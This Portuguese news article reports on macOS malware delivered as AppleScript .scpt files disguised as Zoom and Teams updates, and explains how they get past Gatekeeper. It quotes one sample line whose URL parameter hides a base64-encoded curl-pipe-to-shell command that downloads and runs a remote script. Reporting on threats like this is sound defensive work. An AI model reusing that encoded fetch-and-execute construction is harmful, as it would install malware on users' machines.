Hackers usam AppleScript como arma para distribuir malware para macOS

Hackers usam AppleScript como arma para distribuir malware para macOS disfarçado de atualização do Zoom/Teams.

Os agentes maliciosos continuam a evoluir suas técnicas para burlar os controles de segurança do macOS, afastando-se dos vetores de ataque tradicionais que a Apple corrigiu sistematicamente.

Após a Apple remover a opção de “clicar com o botão direito e abrir” do Gatekeeper em agosto de 2024, os atacantes identificaram e exploraram um novo mecanismo de distribuição usando arquivos AppleScript compilados com convenções de nomenclatura enganosas.

Esses arquivos .scpt estão sendo cada vez mais utilizados para distribuir malware que se disfarça de atualizações de software legítimas, incluindo instaladores falsos do Zoom e do Microsoft Teams.

A ameaça emergente centra-se em arquivos .scpt que abrem diretamente no Script Editor.app por padrão, criando uma superfície de ataque atrativa para agentes maliciosos.

Quando os usuários clicam duas vezes nesses arquivos, o aplicativo exibe uma interface amigável com instruções de engenharia social que incentivam a execução do comando.

Os operadores de malware inserem estrategicamente código malicioso após extensas linhas em branco para ocultar a carga útil real de uma inspeção superficial.

Ao simplesmente clicar no botão “Executar” ou pressionar Cmd+R, os usuários executam inadvertidamente o script, mesmo que ele tenha sido sinalizado pelas proteções de quarentena do Gatekeeper, burlando efetivamente os mecanismos de segurança da Apple.

Analistas de segurança da Moonlock Labs e Pepe Berba identificaram essa técnica ganhando destaque nos últimos meses, descobrindo campanhas sofisticadas que antes apareciam em operações avançadas de ameaças persistentes.

Pepe Berba observou que, embora os arquivos AppleScript em si não sejam novidade, a proliferação de exemplos que utilizam essa técnica representa uma tendência preocupante, principalmente porque famílias de malware comuns , como MacSync Stealer e Odyssey Stealer, adotaram a metodologia.

Este é um caso clássico de técnicas avançadas que, por parte de agentes patrocinados pelo Estado, acabam sendo disseminadas para operações cibercriminosas comuns.

Estrutura técnica

A estrutura técnica desses roteiros emprega diversas táticas de engano engenhosas.

Uma amostra analisada revela código AppleScript como o set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY="seguido por do shell script "open -g " & quoted form of teamsSDKURL.

Essa estrutura de comando abre URLs maliciosas em segundo plano, enquanto apresenta ao usuário solicitações de atualização com aparência legítima.

Os próprios nomes dos arquivos servem como a principal camada de engano, com variantes incluindo “MSTeamsUpdate.scpt”, “Zoom SDK Update.scpt” e “Microsoft.TeamsSDK.scpt”.

A persistência e a capacidade de evasão de detecção desses ataques merecem atenção especial.

Muitos arquivos .scpt atualmente não apresentam nenhuma detecção no VirusTotal, proporcionando aos atacantes uma margem de manobra significativa antes que os fornecedores de segurança implementem assinaturas de detecção.

Os arquivos geralmente chegam por meio de e-mails de phishing ou sites comprometidos que oferecem atualizações de software, visando usuários que buscam atualizações legítimas de versão.

Esse vetor de ataque representa um desafio significativo para a segurança do macOS, pois explora a confiança do usuário em nomes de aplicativos familiares, ao mesmo tempo que se aproveita de ferramentas nativas do sistema com as quais usuários legítimos interagem regularmente.

As organizações devem educar os usuários sobre a importância de verificar as atualizações de software por meio dos canais oficiais e implementar soluções de detecção de endpoints capazes de monitorar os padrões de execução do AppleScript.

Por: Tushar Subhra Dutta repórter sênior de cibersegurança e violações de dados. Publicado em CyberSecurityNews

Veja também:

• Hackers exploram vulnerabilidade SSRF em GPTs
• Louvre senha: Louvre
• Cresce número de incidentes reportados à ANPD
• Empresas tem desafio de equilibrar segurança cibernética e inovação
• A falsa sensação de segurança
• Incidente AWS reforça importânica do BCP
• Da inovação à proteção: os desafios da cibersegurança na era da IA
• Guerra digital: como a segurança dos pagamentos se reinventa
• Como SOCs enfrentam as ameaças cibernéticas no Brasil
• Novas vulnerabilidades de IA abrem caminho para vazamento de dados
• 38% dos internautas brasileiros utilizam VPNs regularmente
• Protocolo DeFi sofre ataque de R$ 688 milhões